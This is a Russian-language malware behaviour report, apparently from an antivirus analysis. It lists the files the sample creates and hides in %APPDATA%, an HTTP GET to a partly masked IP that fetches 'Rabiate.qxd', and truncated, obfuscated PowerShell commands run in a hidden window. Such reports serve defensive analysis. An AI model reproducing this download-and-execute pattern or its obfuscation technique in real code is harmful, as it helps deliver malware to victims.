Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\bitc1d8.tmp
- %APPDATA%\bit148a.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\bitc1d8.tmp
- %APPDATA%\bit148a.tmp
Перемещает следующие файлы
- %APPDATA%\bitc1d8.tmp в %APPDATA%\semiconditioned.rab
- %APPDATA%\bit148a.tmp в %APPDATA%\semiconditioned.rab
Сетевая активность
Подключается к
- '85.##9.176.46':80
TCP
Запросы HTTP GET
- http://85.##9.176.46/Rabiate.qxd
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...
